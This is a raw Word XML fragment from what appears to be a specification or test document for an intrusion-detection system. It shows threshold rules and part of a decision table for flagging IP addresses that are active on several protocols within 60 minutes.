              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rows before/after: 1/1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9047" w:name="_Toc69047"/>
      <w:r>
        <w:t xml:space="preserve">Multi-Protocol Attack Detection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9047"/>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An IP active on 2 different protocols within 60 minutes is a MULTI_PROTOCOL_ATTACK with HIGH severity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An IP active on 3 or more protocols is CRITICAL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Plain connect events are ignored, so a port scan alone does not count as protocol activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decision table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">24</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Decision Table for Multi-Protocol Attack Detection</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BE67570" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="66DB380B" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Distinct protocols in 60 min ≥ 2?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="66DB380B" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Distinct protocols ≥ 3?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="66DB380B" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">All 4+ protocols used?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="5C3E1234" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No multi-protocol detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
